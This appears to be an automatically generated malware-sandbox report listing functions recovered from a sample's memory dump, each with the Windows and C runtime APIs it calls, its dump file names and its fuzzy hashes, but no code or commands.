Opcode Fuzzy Hash: ae7562fad31aea7a79947b09d1a64fe04ca94599a7a0b2dc805ed5788f65d4ff
Instruction Fuzzy Hash: 89219371A0029C9BCF51DFD4D849BEE7BFC9F59304F00405AE504AB281DBB45A89DFA1

Function 00A6D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f1aa1c7e67fe6f7d89dd52ae967c1b641c489a2e85ee244bfd80c67eccda65
Instruction ID: de7105444b95b09f7bb38fc8848349acfeca05ffebbfce7545c483a28537a590
Opcode Fuzzy Hash: 77f1aa1c7e67fe6f7d89dd52ae967c1b641c489a2e85ee244bfd80c67eccda65
Instruction Fuzzy Hash: 6CF13574A083049FC714DF28C584A6ABBF5FF88354F14892EF99A9B251DB30E945CF82

Function 00A01680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A016DB
_memmove.LIBCMT ref: 00A0174C
_memmove.LIBCMT ref: 00A017B9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c56a59336fd5587ef53fd3d7344cd487b26cda55964a65c3e9be459362767724
Instruction ID: 2bc95ff25c36904413404f263e67447486b9449d41381f91cc7d760a484755e5
Opcode Fuzzy Hash: c56a59336fd5587ef53fd3d7344cd487b26cda55964a65c3e9be459362767724
Instruction Fuzzy Hash: 5F61DD71A0020DEBDF04CF29E981AAA7BB5FF44310F5481A9EC59CF295EB31D9A0CB50

Function 009FAC2A Relevance: 4.6, APIs: 3, Instructions: 90comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A0FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A74186,00000001,00A80980), ref: 00A0FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009FAD08
OleInitialize.OLE32(00000000), ref: 009FAD85
CloseHandle.KERNEL32(00000000), ref: 00A32F56

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: b4f75670e97fdfa378a951b37d4629e4baa9a883439af975d0464aa7549e563a
Instruction ID: fae76fbd0dc64d10a7ded496501bfbdda662af7a557215cf9c2f8bb3bbdc481c
Opcode Fuzzy Hash: b4f75670e97fdfa378a951b37d4629e4baa9a883439af975d0464aa7549e563a
Instruction Fuzzy Hash: B441F2B09092408EC355EFA9FD54AAD7FE8EBD8311710876AE018D72B3EBB05487CB51

Function 00A059D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A059F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A05A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A05ABB

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: ac3d1543901f94f44be4dcd41f03a5ad33736142d1e63a2184c4ed16df7949bd
Instruction ID: ec1e7ea25b62ff2b162dbacf62a540941ade96b162afc639dbfd124df7a4d8f4
Opcode Fuzzy Hash: ac3d1543901f94f44be4dcd41f03a5ad33736142d1e63a2184c4ed16df7949bd
Instruction Fuzzy Hash: A53152B0A057058FD760DF74E88869BBBF4FB88344F000A2EF69A86291D7B1A945CB51

Function 00A1593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00A15953

Part of subcall function 00A1A39B: __NMSG_WRITE.LIBCMT ref: 00A1A3C2
Part of subcall function 00A1A39B: __NMSG_WRITE.LIBCMT ref: 00A1A3CC

__NMSG_WRITE.LIBCMT ref: 00A1595A

Part of subcall function 00A1A3F8: GetModuleFileNameW.KERNEL32(00000000,00AB53BA,00000104,00000004,00000001,00A11003), ref: 00A1A48A
Part of subcall function 00A1A3F8: ___crtMessageBoxW.LIBCMT ref: 00A1A538

Part of subcall function 00A132CF: ___crtCorExitProcess.LIBCMT ref: 00A132D5
Part of subcall function 00A132CF: ExitProcess.KERNEL32 ref: 00A132DE

Part of subcall function 00A18D58: __getptd_noexit.LIBCMT ref: 00A18D58

RtlAllocateHeap.NTDLL(01010000,00000000,00000001,?,00000004,?,?,00A11003,?), ref: 00A1597F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: b9504598fc5d3bc8b09101bc3fb420d8c659bebbd916d3da39e0f499ee745b0e
Instruction ID: 5b892434245b7ff90df9a33d46c60704548589af64fb3a52556f0cfc2fd277d0
Opcode Fuzzy Hash: b9504598fc5d3bc8b09101bc3fb420d8c659bebbd916d3da39e0f499ee745b0e
Instruction Fuzzy Hash: 8101F536A02B01DBEA117B74AD02BEE32598F92770F540526F4149E1E1DEB48DC14B62

Function 00A592C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A592D6

Part of subcall function 00A12F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00A19C54,00000000,00A18D5D,00A159C3), ref: 00A12F99
Part of subcall function 00A12F85: GetLastError.KERNEL32(00000000,?,00A19C54,00000000,00A18D5D,00A159C3), ref: 00A12FAB

_free.LIBCMT ref: 00A592E7
_free.LIBCMT ref: 00A592F9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: 0c1931184c22eaec71634cb2abd283ec5adbd74575dd13a16d476d06ff4acfc2
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: E8E0C2A120871293CA20A6387A44FD777EC1F88312F14040DB809DB146CE30E8A28228

Function 009F5E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 00A2E234

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 8fdb158144c62d9f0aaba3c949e08fc5d26687f92581061f43e4b2b2b7c6fa22
Instruction ID: ea9f4ebbdba86315bc174253ddc305f60c9bf22d0e6b1e20d661c16d417fcffa
Opcode Fuzzy Hash: 8fdb158144c62d9f0aaba3c949e08fc5d26687f92581061f43e4b2b2b7c6fa22
Instruction Fuzzy Hash: 0D326A70608315DFC724DF18C580A6ABBE5BF84304F15896DFA8A9B362D735EC85CB82

Function 00A048B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A048FA

Strings

EA06, xrefs: 00A408A1

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: e84d5bad7277503e3428b0b3671f689365d86b32dae3f4ff7c27d0a230ac4c42
Instruction ID: b3b01e724cc0811b5646be6b7b3edd1c20242f10675ba5bcb56bcf0e90fd73a3
Opcode Fuzzy Hash: e84d5bad7277503e3428b0b3671f689365d86b32dae3f4ff7c27d0a230ac4c42
Instruction Fuzzy Hash: 9A418BB1A0425C5BDF219B64AA51BBF7FB5AB5D340F584074EB82EB2C6C6308D8483E1

Function 00A6E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00A6E20C

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

_wcscpy.LIBCMT ref: 00A6E29B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 4f14097c3e34d8ff9a7b5df19dff6ca83f8f2c6609eef456be06600dcc746ea7
Instruction ID: 8d2ef452f387ccb32d3a6ac083df19edc5df6d35438c797cfc5f5929c17e1240
Opcode Fuzzy Hash: 4f14097c3e34d8ff9a7b5df19dff6ca83f8f2c6609eef456be06600dcc746ea7
Instruction Fuzzy Hash: 1B913739A00604DFCB18DF28C5919A9B7F5FF99310B55805AE90A8F3A2DB30ED55CF81

Function 00A56818 Relevance: 3.2, APIs: 2, Instructions: 216COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A568EC
_memmove.LIBCMT ref: 00A5690A

Part of subcall function 00A56A73: _memmove.LIBCMT ref: 00A56B01

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
Instruction ID: b469ba61100f2332ac77f0b995bbf453573acbc0e9bac8f26975ba0895299211
Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
Instruction Fuzzy Hash: 8871B070600604DFCB249F14D845BBAB7B5FF94366F68C508EED52B282CB35AD49CB90

Function 00A56135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00A5614E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 9e2fecc8f9efb0462833687627b2b395fdbd019a21b6431bb7b8263714de2b37
Instruction ID: 917845ab95b816d865b2d2fb9946144ff0f5adef9c15c4c4d742ebe6d0a49c98
Opcode Fuzzy Hash: 9e2fecc8f9efb0462833687627b2b395fdbd019a21b6431bb7b8263714de2b37
Instruction Fuzzy Hash: 2B41D5B6A006099FDB11DFA8C8818FEB3B8FB54351F50462EE91687281EB70DE49CB50

Function 00A57D6E Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A57E96

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 38d8ba0eddc5ffd21b23cc36f4ebc13a59a0bc904e0ecf5c1280ddf31e3f492e
Instruction ID: f5cea250acac581e22d502f5e6fbae4c68590fc5841473af098c69a563b14255
Opcode Fuzzy Hash: 38d8ba0eddc5ffd21b23cc36f4ebc13a59a0bc904e0ecf5c1280ddf31e3f492e
Instruction Fuzzy Hash: 6341B9725083099FC710EFA8E983DBEB7B8FF49341B244599FA85A7281DB719C45CB60

Function 00A05F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00A05FEF

Part of subcall function 00A1359C: __lock.LIBCMT ref: 00A135A2
Part of subcall function 00A1359C: DecodePointer.KERNEL32(00000001,?,00A06004,00A48892), ref: 00A135AE
Part of subcall function 00A1359C: EncodePointer.KERNEL32(?,?,00A06004,00A48892), ref: 00A135B9

Part of subcall function 00A05F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A05F18
Part of subcall function 00A05F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A05F2D

Part of subcall function 00A05240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A0526C
Part of subcall function 00A05240: IsDebuggerPresent.KERNEL32 ref: 00A0527E
Part of subcall function 00A05240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A052E6
Part of subcall function 00A05240: SetCurrentDirectoryW.KERNEL32(?), ref: 00A05366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00A0602F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: f1c25b35bf83cc32e57f1ef4257f2042da739541b8610a77b3f902a2769f3ee4
Instruction ID: 2a026754bf05c8786f21d497e098fde0b78e520e7c9c4ddcd56fa5c78c1e3446
Opcode Fuzzy Hash: f1c25b35bf83cc32e57f1ef4257f2042da739541b8610a77b3f902a2769f3ee4
Instruction Fuzzy Hash: 10118CB18083059BC710DFA8ED4595FBBE8EFC8710F004A1AF154872B2DBB09946CB92

Function 00A10FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A1593C: __FF_MSGBANNER.LIBCMT ref: 00A15953
Part of subcall function 00A1593C: __NMSG_WRITE.LIBCMT ref: 00A1595A
Part of subcall function 00A1593C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,?,00000004,?,?,00A11003,?), ref: 00A1597F

std::exception::exception.LIBCMT ref: 00A1101C
__CxxThrowException@8.LIBCMT ref: 00A11031

Part of subcall function 00A187CB: RaiseException.KERNEL32(?,?,?,00AACAF8,?,?,?,?,?,00A11036,?,00AACAF8,?,00000001), ref: 00A18820

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 6a5ed7ce911fcae46fa74829d8802a2d43687a06a445e3adae5ea9ab140e674e
Instruction ID: 9c2f62c503e7851594d784d3ef506373ca00428721a8e89d34dca61af56a3553
Opcode Fuzzy Hash: 6a5ed7ce911fcae46fa74829d8802a2d43687a06a445e3adae5ea9ab140e674e
Instruction Fuzzy Hash: F2F0C83690421DB6CF20BB69ED16DEE77AC9F05750F100455F914962D1EFB18BC1C2E5

Function 00A1581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A1584C
__lock_file.LIBCMT ref: 00A1586D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 1005701a058f7930f54328227b0965af83cbc6423dcd6bc9ad249d14eb652d66
Instruction ID: c15c18ea5bc21e87f3d7b994d453f64ebc231ca22fa9d8d00df78289833b4ee1
Opcode Fuzzy Hash: 1005701a058f7930f54328227b0965af83cbc6423dcd6bc9ad249d14eb652d66
Instruction Fuzzy Hash: 07014471C00749EBCF11AF7ACD019DE7B71AFC0360F184115B8245B1A1D7358A91EF91

Function 00A155C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A18D58: __getptd_noexit.LIBCMT ref: 00A18D58

__lock_file.LIBCMT ref: 00A1560B

Part of subcall function 00A16E3E: __lock.LIBCMT ref: 00A16E61

__fclose_nolock.LIBCMT ref: 00A15616

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 90e118e9c26878f2e79063cbb91c50fffebf7cd04934c0538160d90bd3544772
Instruction ID: e87e53af0ee6d0e82da35d217aa43680b979155a04f653e7b5894ae74105ea01
Opcode Fuzzy Hash: 90e118e9c26878f2e79063cbb91c50fffebf7cd04934c0538160d90bd3544772
Instruction Fuzzy Hash: 32F0B471C05B05DBD7106F7989027EE77E26F81330F15820AB428AB1C1CBBC4AC19F55

Function 00A15E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00A15EB4
__ftell_nolock.LIBCMT ref: 00A15EBF

Part of subcall function 00A18D58: __getptd_noexit.LIBCMT ref: 00A18D58

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 0e23dbd5ef1c5c7dc1efe2b1c19d68fd17467c3dbf30614194073983fecb93bb
Instruction ID: b5723c4b6c0da650b69b3f5924cbe24fa2f469de3aec6bf1fd9da9209c8bb2e2
Opcode Fuzzy Hash: 0e23dbd5ef1c5c7dc1efe2b1c19d68fd17467c3dbf30614194073983fecb93bb
Instruction Fuzzy Hash: FFF0A031D55715EADB00BB788A037DE72A06F81331F214206B424AB1C2CF7C8AC29A95

Function 00A05AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A05AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A05B1F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: b9bdea8cf943d1563d6fa4beca718a37d14b0fae87c0ca0c0e9e5a42a90c8867
